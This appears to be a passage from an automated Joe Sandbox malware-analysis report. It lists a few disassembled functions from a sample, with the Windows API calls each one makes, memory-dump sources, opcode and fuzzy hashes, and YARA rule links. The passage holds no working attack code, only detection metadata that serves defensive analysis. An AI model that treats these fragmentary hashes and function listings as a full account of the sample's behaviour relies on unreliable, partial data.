                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                          • Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
                                                          • Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                          • Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
                                                          Function 00405570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040559F
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                            • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                          • Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
                                                          • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                          • Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
                                                          Function 00406096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004060B4
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403550,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040383C), ref: 004060CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                          Function 00405FCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                          • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68